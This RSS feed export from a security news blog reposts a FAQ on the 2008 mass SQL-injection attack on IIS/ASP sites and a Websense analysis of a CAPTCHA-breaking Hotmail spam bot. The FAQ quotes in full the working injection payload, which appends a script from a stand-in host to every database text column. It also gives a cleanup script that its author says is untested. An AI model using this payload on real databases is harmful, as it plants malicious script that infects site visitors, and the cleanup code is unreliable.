&lt;/p&gt;
&lt;p&gt;
Members are searching for the malicious software program's author and for ways to
do damage control if he or she can't be stopped.
&lt;/p&gt;
&lt;p&gt;
They're motivated in part by a $250,000 bounty from Microsoft. 
&lt;/p&gt;
&lt;p&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;a title="http://www.cnn.com/2009/TECH/03/31/april.fools.computer.virus/index.html?iref=newssearch" href="http://www.cnn.com"&gt;http://www.cnn.com&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
      <category>tech</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=869fb3a0-0bc8-4f9f-9332-96f63fdb6ffc</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,869fb3a0-0bc8-4f9f-9332-96f63fdb6ffc.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
[QUOTE]<br />
Reports about the massive infection of web sites by an <a href="http://isc.sans.org/diary.html?n&amp;storyid=4294">automated
tool</a>, whose most recent prominent victims have been <a href="http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-you-so/">United
Nations, UK Government</a> and the U.S. <a href="http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/">Department
of Homeland Security</a> raised some recurring questions which are worth answering.
</p>
        <ol>
          <li>
            <a href="http://hackademix.net/#iis">The attack is targeting Microsoft IIS web servers.
Is there a Microsoft vulnerability?</a>
          </li>
          <li>
            <a href="http://hackademix.net/#webdev">What can I do if I’m the administrator of
an infected site?</a>
          </li>
          <li>
            <a href="http://hackademix.net/#user">What should I do as a user to protect myself?</a>
          </li>
          <li>
            <a href="http://hackademix.net/#trusted">How can NoScript protect if the compromised
sites are in my trusted whitelist?</a>
          </li>
        </ol>
        <p align="center">
          <img title="Exploits of a Mom" src="http://imgs.xkcd.com/comics/exploits_of_a_mom.png" />
          <br />
“Exploits of a Mom” by <a href="http://xkcd.com/327/">xkcd</a></p>
        <ol>
          <li>
            <h6>The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft
vulnerability?
</h6>
            <p>
Yes and no. Web developers (or their employers who did not mandate proper security
education) are to blame for each single infection, because the SQL injection exploited
to infect the web sites is possible thanks to trivial coding errors.<br />
That said, the attackers are targeting IIS web servers which run <a href="http://en.wikipedia.org/wiki/Active_Server_Pages">ASP</a> for
a reason.<br />
Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL
Server database in a generic way, with no need of knowing the specific table and fields
layouts:<br /><code><br />
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR<br />
FOR select a.name,b.name from sysobjects a,syscolumns b where<br />
a.id=b.id and a.xtype='u' and<br />
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)<br />
OPEN<br />
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C<br />
WHILE(@@FETCH_STATUS=0) BEGIN<br />
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+<br />
''&lt;script src=http://evilsite.com/1.js&gt;&lt;/script&gt;''')<br />
FETCH NEXT FROM Table_Cursor INTO @T,@C<br />
END<br />
CLOSE Table_Cursor<br />
DEALLOCATE Table_Cursor;<br /></code><br />
This is the “secret sauce” which is allowing the attack to reach its impressive numbers,
and <em>it works exclusively against Microsoft database technology</em> — but it’s
a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful”
DB technology of being used in conjunction with web servers different than IIS are
very low.<br />
So, to recap: 
</p>
            <ol>
              <li>
There’s no Microsoft-specific vulnerability involved: SQL injections can happen (and
do happen) on LAMP and other web application stacks as well. 
</li>
              <li>
SQL injections, and therefore these infections, are caused by poor coding practices
during web site development. 
</li>
              <li>
Nonetheless, this <em>mass automated</em> epidemic is due to specific features of
Microsoft databases, allowing the exploit code to be generic, rather than tailored
for each single web site. <strong>Update</strong>: more details in <a href="http://hackademix.net/#comment-7742">this
comment</a>. 
</li>
            </ol>
            <p>
In my previous coverage of <a href="http://hackademix.net/2007/08/12/united-nations-vs-sql-injections/">similar
incidents</a> I also assumed a statistical/demographic reason for targeting IIS, since
many ASP developers having a desktop Visual Basic background underwent a pretty traumatic
migration to the web in the late 90s, and often didn’t really grow enough security
awareness to develop safe internet-facing applications.
</p>
          </li>
          <li>
            <h6>What should I do if I’m the administrator of an infected site?
</h6>
            <p>
First of all, you should call your web developers (or even better, someone who specializes
in web application security) and require a full code review to find and fix the SQL
injection bugs.<br />
In the meanwhile you should either put your database offline or recover clean data
from a backup, but until the code review is done be prepared to get compromised again.
Deploying a web application firewall may mitigate the emergency, but you must understand
it’s a merely temporary work-around — the solution is fixing the code (learn from
the <a href="http://hackademix.net/2007/08/14/unpatched-or-can-you-secure-a-glass-palace/">United
Nations tale</a>).<br />
If you’ve got no clean database backup, you could try to recover by brutally reversing
the SQL attack:<br /><code><br />
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR<br />
FOR select a.name,b.name from sysobjects a,syscolumns b where<br />
a.id=b.id and a.xtype='u' and<br />
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)<br />
OPEN<br />
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C<br />
WHILE(@@FETCH_STATUS=0) BEGIN<br />
/* strip the appended tag: keep the len - patindex - 6 characters that precede the last &lt;script */<br />
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),<br />
len(['+@C+'])-patindex(''%tpircs&lt;%'', reverse(['+@C+']))-6))<br />
where ['+@C+'] like ''%&lt;script%&lt;/script&gt;''')<br />
FETCH NEXT FROM Table_Cursor INTO @T,@C<br />
END<br />
CLOSE Table_Cursor<br />
DEALLOCATE Table_Cursor;<br /></code><br />
This SQL procedure walks through your tables and fields, just like its evil prototype,
but rather than appending the malicious JavaScript with<br /><code><br />
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+<br />
''&lt;script src=http://evilsite.com/1.js&gt;&lt;/script&gt;''')<br /></code><br />
it locates and removes it with<br /><code><br />
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),<br />
len(['+@C+'])-patindex(''%tpircs&lt;%'', reverse(['+@C+']))-6))<br />
where ['+@C+'] like ''%&lt;script%&lt;/script&gt;''')<br /></code><br />
Notice that I’ve not tested my code above, and I’m just providing it as a courtesy:
use it at your own risk, after doing a backup of your data.
</p>
          </li>
          <li>
            <h6>What should I do as a user to protect myself?
</h6>
            <p>
OK, this one is <a href="http://noscript.net">the easiest</a> :) 
</p>
          </li>
          <li>
            <h6>How can NoScript protect if the compromised sites are in my trusted whitelist?
</h6>
            <p>
Even if the compromised site is in your whitelist, allowed to run JavaScript, the
malicious scripts are hosted on <em>external</em> servers controlled by the attackers
(e.g. <code>www.nihaorr1.com</code>): therefore <a href="http://noscript.net">NoScript</a> prevents
them from being loaded and effectively defeats the attack. 
</p>
          </li>
        </ol>
        <p>
[/QUOTE] 
</p>
        <p>
          <strong>Source:</strong>
          <a title="http://hackademix.net/2008/04/26/mass-attack-faq/" href="http://hackademix.net/2008/04/26/mass-attack-faq/">http://hackademix.net/2008/04/26/mass-attack-faq/</a>
        </p>
      </body>
      <title>Mass Attack FAQ</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,869fb3a0-0bc8-4f9f-9332-96f63fdb6ffc.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2008/04/30/MassAttackFAQ.aspx</link>
      <pubDate>Wed, 30 Apr 2008 11:09:41 GMT</pubDate>
      <description>&lt;p&gt;
[QUOTE]&lt;br&gt;
Reports about the massive infection of web sites by an &lt;a href="http://isc.sans.org/diary.html?n&amp;amp;storyid=4294"&gt;automated
tool&lt;/a&gt;, whose most recent prominent victims have been &lt;a href="http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-you-so/"&gt;United
Nations, UK Government&lt;/a&gt; and the U.S. &lt;a href="http://www.theregister.co.uk/2008/04/25/mass_web_attack_grows/"&gt;Department
of Homeland Security&lt;/a&gt; raised some recurring questions which are worth answering.
&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;a href="http://hackademix.net/#iis"&gt;The attack is targeting Microsoft IIS web servers.
Is there a Microsoft vulnerability?&lt;/a&gt; 
&lt;li&gt;
&lt;a href="http://hackademix.net/#webdev"&gt;What can I do if I’m the administrator of
an infected site?&lt;/a&gt; 
&lt;li&gt;
&lt;a href="http://hackademix.net/#user"&gt;What should I do as a user to protect myself?&lt;/a&gt; 
&lt;li&gt;
&lt;a href="http://hackademix.net/#trusted"&gt;How can NoScript protect if the compromised
sites are in my trusted whitelist?&lt;/a&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p align="center"&gt;
&lt;img title="Exploits of a Mom" src="http://imgs.xkcd.com/comics/exploits_of_a_mom.png"&gt;
&lt;br&gt;
“Exploits of a Mom” by &lt;a href="http://xkcd.com/327/"&gt;xkcd&lt;/a&gt;
&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;h6&gt;The attack is targeting Microsoft IIS web servers. Is it exploiting a Microsoft
vulnerability?
&lt;/h6&gt;
&lt;p&gt;
Yes and no. Web developers (or their employers who did not mandate proper security
education) are to blame for each single infection, because the SQL injection exploited
to infect the web sites is possible thanks to trivial coding errors.&lt;br&gt;
That said, the attackers are targeting IIS web servers which run &lt;a href="http://en.wikipedia.org/wiki/Active_Server_Pages"&gt;ASP&lt;/a&gt; for
a reason.&lt;br&gt;
Crackers put together a clever SQL procedure capable of polluting any Microsoft SQL
Server database in a generic way, with no need of knowing the specific table and fields
layouts:&lt;br&gt;
&lt;code&gt;
&lt;br&gt;
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR&lt;br&gt;
FOR select a.name,b.name from sysobjects a,syscolumns b where&lt;br&gt;
a.id=b.id and a.xtype='u' and&lt;br&gt;
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)&lt;br&gt;
OPEN&lt;br&gt;
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C&lt;br&gt;
WHILE(@@FETCH_STATUS=0) BEGIN&lt;br&gt;
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+&lt;br&gt;
''&amp;lt;script src=http://evilsite.com/1.js&amp;gt;&amp;lt;/script&amp;gt;''')&lt;br&gt;
FETCH NEXT FROM Table_Cursor INTO @T,@C&lt;br&gt;
END&lt;br&gt;
CLOSE Table_Cursor&lt;br&gt;
DEALLOCATE Table_Cursor;&lt;br&gt;
&lt;/code&gt;
&lt;br&gt;
This is the “secret sauce” which is allowing the attack to reach its impressive numbers,
and &lt;em&gt;it works exclusively against Microsoft database technology&lt;/em&gt; — but it’s
a feature, not a bug (no irony intended this time). Anyway, the chances for such “powerful”
DB technology of being used in conjunction with web servers different than IIS are
very low.&lt;br&gt;
So, to recap: 
&lt;ol&gt;
&lt;li&gt;
There’s no Microsoft-specific vulnerability involved: SQL injections can happen (and
do happen) on LAMP and other web application stacks as well. 
&lt;li&gt;
SQL injections, and therefore these infections, are caused by poor coding practices
during web site development. 
&lt;li&gt;
Nonetheless, this &lt;em&gt;mass automated&lt;/em&gt; epidemic is due to specific features of
Microsoft databases, allowing the exploit code to be generic, rather than tailored
for each single web site. &lt;strong&gt;Update&lt;/strong&gt;: more details in &lt;a href="http://hackademix.net/#comment-7742"&gt;this
comment&lt;/a&gt;. 
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;
In my previous coverage of &lt;a href="http://hackademix.net/2007/08/12/united-nations-vs-sql-injections/"&gt;similar
incidents&lt;/a&gt; I also assumed a statistical/demographic reason for targeting IIS, since
many ASP developers having a desktop Visual Basic background underwent a pretty traumatic
migration to the web in the late 90s, and often didn’t really grow enough security
awareness to develop safe internet-facing applications.
&lt;/p&gt;
&lt;li&gt;
&lt;h6&gt;What should I do if I’m the administrator of an infected site?
&lt;/h6&gt;
&lt;p&gt;
First of all, you should call your web developers (or even better, someone who specializes
in web application security) and require a full code review to find and fix the SQL
injection bugs.&lt;br&gt;
In the meanwhile you should either put your database offline or recover clean data
from a backup, but until the code review is done be prepared to get compromised again.
Deploying a web application firewall may mitigate the emergency, but you must understand
it’s a merely temporary work-around — the solution is fixing the code (learn from
the &lt;a href="http://hackademix.net/2007/08/14/unpatched-or-can-you-secure-a-glass-palace/"&gt;United
Nations tale&lt;/a&gt;).&lt;br&gt;
If you’ve got no clean database backup, you could try to recover by brutally reversing
the SQL attack:&lt;br&gt;
&lt;code&gt;
&lt;br&gt;
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR&lt;br&gt;
FOR select a.name,b.name from sysobjects a,syscolumns b where&lt;br&gt;
a.id=b.id and a.xtype='u' and&lt;br&gt;
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)&lt;br&gt;
OPEN&lt;br&gt;
Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C&lt;br&gt;
WHILE(@@FETCH_STATUS=0) BEGIN&lt;br&gt;
/* strip the appended tag: keep the len - patindex - 6 characters that precede the last &amp;lt;script */&lt;br&gt;
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),&lt;br&gt;
len(['+@C+'])-patindex(''%tpircs&amp;lt;%'', reverse(['+@C+']))-6))&lt;br&gt;
where ['+@C+'] like ''%&amp;lt;script%&amp;lt;/script&amp;gt;''')&lt;br&gt;
FETCH NEXT FROM Table_Cursor INTO @T,@C&lt;br&gt;
END&lt;br&gt;
CLOSE Table_Cursor&lt;br&gt;
DEALLOCATE Table_Cursor;&lt;br&gt;
&lt;/code&gt;
&lt;br&gt;
This SQL procedure walks through your tables and fields, just like its evil prototype,
but rather than appending the malicious JavaScript with&lt;br&gt;
&lt;code&gt;
&lt;br&gt;
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+&lt;br&gt;
''&amp;lt;script src=http://evilsite.com/1.js&amp;gt;&amp;lt;/script&amp;gt;''')&lt;br&gt;
&lt;/code&gt;
&lt;br&gt;
it locates and removes it with&lt;br&gt;
&lt;code&gt;
&lt;br&gt;
exec('update ['+@T+'] set ['+@C+']=reverse(right(reverse(['+@C+']),&lt;br&gt;
len(['+@C+'])-patindex(''%tpircs&amp;lt;%'', reverse(['+@C+']))-6))&lt;br&gt;
where ['+@C+'] like ''%&amp;lt;script%&amp;lt;/script&amp;gt;''')&lt;br&gt;
&lt;/code&gt;
&lt;br&gt;
Notice that I’ve not tested my code above, and I’m just providing it as a courtesy:
use it at your own risk, after doing a backup of your data.
&lt;/p&gt;
&lt;li&gt;
&lt;h6&gt;What should I do as a user to protect myself?
&lt;/h6&gt;
&lt;p&gt;
OK, this one is &lt;a href="http://noscript.net"&gt;the easiest&lt;/a&gt; :) 
&lt;/p&gt;
&lt;li&gt;
&lt;h6&gt;How can NoScript protect if the compromised sites are in my trusted whitelist?
&lt;/h6&gt;
&lt;p&gt;
Even if the compromised site is in your whitelist, allowed to run JavaScript, the
malicious scripts are hosted on &lt;em&gt;external&lt;/em&gt; servers controlled by the attackers
(e.g. &lt;code&gt;www.nihaorr1.com&lt;/code&gt;): therefore &lt;a href="http://noscript.net"&gt;NoScript&lt;/a&gt; prevents
them from being loaded and effectively defeats the attack. 
&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;
[/QUOTE] 
&lt;p&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;a title="http://hackademix.net/2008/04/26/mass-attack-faq/" href="http://hackademix.net/2008/04/26/mass-attack-faq/"&gt;http://hackademix.net/2008/04/26/mass-attack-faq/&lt;/a&gt;
&lt;/p&gt;
</description>
      <category>EN</category>
      <category>internet</category>
      <category>security</category>
      <category>tech</category>
    </item>
    <item>
      <trackback:ping>http://www.loosy-goosy-ness.com/Trackback.aspx?guid=e19fd07d-206e-4cbc-afaf-d88a390a5d2f</trackback:ping>
      <pingback:server>http://www.loosy-goosy-ness.com/pingback.aspx</pingback:server>
      <pingback:target>http://www.loosy-goosy-ness.com/PermaLink,guid,e19fd07d-206e-4cbc-afaf-d88a390a5d2f.aspx</pingback:target>
      <dc:creator>Christian</dc:creator>
      <body xmlns="http://www.w3.org/1999/xhtml">
        <p>
[QUOTE]<br />
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their
recent tactics have drawn their attention towards traditional and infamous Hotmail,
aka Live Hotmail services after the streamlined Live Mail Anti-CAPTCHA operations.
Spammers have managed to create automated bots that are capable of not only signing
up and creating random Hotmail accounts, but also use these accounts for spamming
purposes from a proper Live Hotmail service. Websense predictions about this sophisticated
spammer strategy at the time of <a href="http://securitylabs.websense.com/content/Blogs/2907.aspx"><u>Live
Mail Anti-CAPTCHA</u></a> and <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx"><u>Gmail
Anti-CAPTCHA</u></a> operations, and its outcomes have been factual with this attack. 
</p>
        <p>
Websense believes that there are four main advantages to spammers from this approach.
First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to
sign up. Third, the integration of Hotmail with a wide range of Windows Live services.
And fourth, it may be hard to keep track of them as there are millions of users worldwide
using the service. 
<br />
Let’s see the entire automated process in two stages. 
</p>
        <p>
          <b>Stage 1: Signing up and creating accounts successfully.</b>
          <br />
          <i>Part 1: Observe the bot hooking itself on to Internet Explorer browser on victims’
machine.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.1.PNG" />
        </p>
        <p>
          <i>Part 2: Observe the set of pre-determined account names injected on to victims’
machine which bot attempts to sign-up over victims’ machine.</i>
          <br />
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.2.PNG" />
        </p>
        <p>
          <i>Part 3: The bot uses Internet Explorer browser in the background on the victims’
machine for attempting Hotmail account sign-up process.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.3.PNG" />
        </p>
        <p>
          <i>Part 4: Observe the bot visiting Microsoft Hotmail account sign-up page, trying
to grab CAPTCHA, and sending it to CAPTCHA breaking host for account creation.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.4.PNG" />
        </p>
        <p>
          <i>Part 5: Try-break, try-break, try-break.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.5.PNG" />
        </p>
        <p>
          <i>Part 6: Observe CAPTCHA images being collected as hidden files from victim’s machine
during different account sign-up attempts.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.6.PNG" />
        </p>
        <p>
          <i>Part 7: Unlike the Live Mail CAPTCHA break process, in this attack, the CAPTCHA breaking
host communication with the victims’ machine is scrambled. It is observed that 8 characters
in the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image
is sent to the breaking host. The bot infected or victims’ machine descrambles it
to signup the account successfully.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.7.PNG" />
        </p>
        <p>
          <i>Part 8: Observe that account is being signed up and created successfully.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.8.PNG" />
        </p>
        <p>
          <i>Part 9: The created account credentials are returned back to CAPTCHA breaking host.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.9.PNG" />
        </p>
        <p>
The entire process is automated and carried out in iterative manner until all the
accounts are successfully signed up in the list injected (initially) on to victims’
machine (refer to <b>Stage 1, Figure 1.2</b>).<br /><b>Stage 2: Spamming using created accounts from a proper Hotmail Server</b><br />
Once all the accounts in the list (refer to <b>Stage 1, Figure 1.2</b>) are signed
up by the bot, they are then picked randomly and used for spamming purposes. 
<br /><i>Part 1: Observe the login process in action.</i></p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.1.PNG" />
        </p>
        <p>
          <i>Part 2: Login process in further progress.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.2.PNG" />
        </p>
        <p>
          <i>Part 3: Proper login in progress over SSL page.</i>
        </p>
        <p>
          <em>
            <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.3.PNG" />
          </em>
        </p>
        <p>
          <em>
            <i>Part 4: Observe the bot attempted a successful login on to a proper Live Hotmail
Server page.</i>
          </em>
        </p>
        <p>
          <em>
            <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.4.PNG" />
          </em>
        </p>
        <p>
          <em>
            <i>Part 5: Observe the bot attempting to initiate the edit process or composing
a message for spamming.</i>
          </em>
        </p>
        <p>
          <em>
            <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.5.PNG" />
          </em>
        </p>
        <p>
          <i>Part 6: Spam message build in progress by the bot.</i>
        </p>
        <p>
          <em>
            <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.6.PNG" />
          </em>
        </p>
        <p>
          <i>Part 7: Bot successfully filling in the "from email address list", “to email address”
lists, email subject, and the body to be included in the message for spamming purposes,
thereby completing its task.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.7.PNG" />
        </p>
        <p>
End of message! Spam is being sent to targeted accounts.<br /><i>Part 8: Finally the account is logged out to continue its similar operation with
the next email account.</i></p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.8.PNG" />
        </p>
        <p>
          <i>Part 9: The entire process in action that is carried out in an iterative manner to
perform mass-mailing from different accounts created by the bot.</i>
        </p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.9.PNG" />
        </p>
        <p>
Spammers finally have success advertising their product. 
</p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.10.PNG" />
        </p>
        <p>
          <b>Observations:</b>
          <br />
          <b>Stage 1: </b>One in every 8 to 10 attempts to sign up a Hotmail account is successful.
Hence the success rate ranges approximately between 10 and 15%.<br /><b>Stage 2: </b>Spam campaigns from one Hotmail account are sent to multiple accounts
in CC and BCC lists at a time. The same Hotmail account (or “from account/address”)
is not repeatedly used for sending spam campaigns continuously. They are changed in a
timely fashion by the bot. The same is the case with targeted accounts (or “to account(s)/addresses”)
for spamming.<br /><b>Additional Information:</b><br />
It is observed that unlike <a href="http://securitylabs.websense.com/content/Blogs/2907.aspx"><u>Live
Mail Anti-CAPTCHA</u></a> and <a href="http://securitylabs.websense.com/content/Blogs/2919.aspx"><u>Gmail
Anti-CAPTCHA</u></a> operations in the past, the current attack is aggressive and
instantaneous in terms of CAPTCHA breaking host turn-around time.<br />
In the current attack, the response time of CAPTCHA breaking host after grabbing a
CAPTCHA image from a victims’ machine, analyzing it, and responding back to victims’
machine with corresponding CAPTCHA code is <i>relatively lower </i>when compared to
previous attacks.<br /><i><b>Note 1:</b> It is observed that the total response time for CAPTCHA breaking
on the average is only about 6 seconds*.</i></p>
        <p>
          <img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-3.PNG" />
        </p>
        <p>
          <i>
            <b>Note 2:</b> The timing on the request/response in this current attack clearly
indicates the possibility of an automated system at the spammers’ end performing the
Anti-CAPTCHA operation.</i>
          <br />
Websense believes that these accounts could be used by the spammers at any time for
a variety of social-engineering attacks in future. A wide range of attacks (both manual
and automated) would be possible using the same account credentials on other significant
Live services integrated with Live Hotmail services offered by Microsoft Corporation,
such as Live Messenger (instant messaging), Live Spaces (online storage), etc.
</p>
        <p>
Note: For more information on Hotmail aka Live Hotmail and Live services, see the
Hotmail, Live Hotmail and Live Mail entries on <a href="http://www.wikipedia.org/"><u>Wikipedia</u></a>.<br />
[/QUOTE]
</p>
        <p>
          <strong>Source: </strong>
          <a title="http://securitylabs.websense.com/content/Blogs/3063.aspx" href="http://securitylabs.websense.com/">http://securitylabs.websense.com/</a>
        </p>
      </body>
      <title>Microsoft Live Hotmail Under Attack by Streamlined Anti-CAPTCHA and Mass-mailing Operations</title>
      <guid isPermaLink="false">http://www.loosy-goosy-ness.com/PermaLink,guid,e19fd07d-206e-4cbc-afaf-d88a390a5d2f.aspx</guid>
      <link>http://www.loosy-goosy-ness.com/2008/04/11/MicrosoftLiveHotmailUnderAttackByStreamlinedAntiCAPTCHAAndMassmailingOperations.aspx</link>
      <pubDate>Fri, 11 Apr 2008 10:52:47 GMT</pubDate>
      <description>&lt;p&gt;
[QUOTE]&lt;br&gt;
Websense Security Labs ThreatSeeker™ technology has discovered that spammers in their
recent tactics have drawn their attention towards traditional and infamous Hotmail,
aka Live Hotmail services after the streamlined Live Mail Anti-CAPTCHA operations.
Spammers have managed to create automated bots that are capable of not only signing
up and creating random Hotmail accounts, but also use these accounts for spamming
purposes from a proper Live Hotmail service. Websense predictions about this sophisticated
spammer strategy at the time of &lt;a href="http://securitylabs.websense.com/content/Blogs/2907.aspx"&gt;&lt;u&gt;Live
Mail Anti-CAPTCHA&lt;/u&gt;&lt;/a&gt; and &lt;a href="http://securitylabs.websense.com/content/Blogs/2919.aspx"&gt;&lt;u&gt;Gmail
Anti-CAPTCHA&lt;/u&gt;&lt;/a&gt; operations, and its outcomes have been factual with this attack. 
&lt;/p&gt;
&lt;p&gt;
Websense believes that there are four main advantages to spammers from this approach.
First, the Microsoft domain is unlikely to be blacklisted. Second, they are free to
sign up. Third, the integration of Hotmail with a wide range of Windows Live services.
And fourth, it may be hard to keep track of them as there are millions of users worldwide
using the service. 
&lt;br&gt;
Let’s see the entire automated process in two stages. 
&lt;/p&gt;
&lt;p&gt;
&lt;b&gt;Stage 1: Signing up and creating accounts successfully.&lt;/b&gt;
&lt;br&gt;
&lt;i&gt;Part 1: Observe the bot hooking itself on to Internet Explorer browser on victims’
machine.&lt;/i&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.1.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 2: Observe the set of pre-determined account names injected on to victims’
machine which bot attempts to sign-up over victims’ machine.&lt;/i&gt;
&lt;br&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.2.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 3: The bot uses Internet Explorer browser in the background on the victims’
machine for attempting Hotmail account sign-up process.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.3.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 4: Observe the bot visiting Microsoft Hotmail account sign-up page, trying
to grab CAPTCHA, and sending it to CAPTCHA breaking host for account creation.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.4.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 5: Try-break, try-break, try-break.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.5.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 6: Observe CAPTCHA images being collected as hidden files from victim’s machine
during different account sign-up attempts.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.6.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 7: Unlike the Live Mail CAPTCHA break process, in this attack the CAPTCHA breaking
host communication with the victims’ machine is scrambled. It is observed that 8 characters
in the CAPTCHA code are returned instantly during the sign-up, after the CAPTCHA image
is sent to the breaking host. The bot-infected or victims’ machine descrambles it
to sign up the account successfully.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.7.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 8: Observe that account is being signed up and created successfully.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.8.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 9: The created account credentials are returned back to CAPTCHA breaking host.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-1.9.PNG"&gt; 
&lt;p&gt;
The entire process is automated and carried out in an iterative manner until all the
accounts are successfully signed up in the list injected (initially) on to victims’
machine (refer to &lt;b&gt;Stage 1, Figure 1.2&lt;/b&gt;).&lt;br&gt;
&lt;b&gt;Stage 2: Spamming using created accounts from a proper Hotmail Server&lt;/b&gt;
&lt;br&gt;
Once all the accounts in the list (refer to &lt;b&gt;Stage 1, Figure 1.2&lt;/b&gt;) are signed
up by the bot, they are then picked randomly and used for spamming purposes. 
&lt;br&gt;
&lt;i&gt;Part 1: Observe the login process in action.&lt;/i&gt; 
&lt;p&gt;
&lt;img src="http://securitylabs.websense.com/content/Assets/BlogMedia/hotmailcatpcha-2.1.PNG"&gt; 
&lt;p&gt;
&lt;i&gt;Part 2: Login process in further progress.&lt;/i&gt; 
&lt;p&gt;
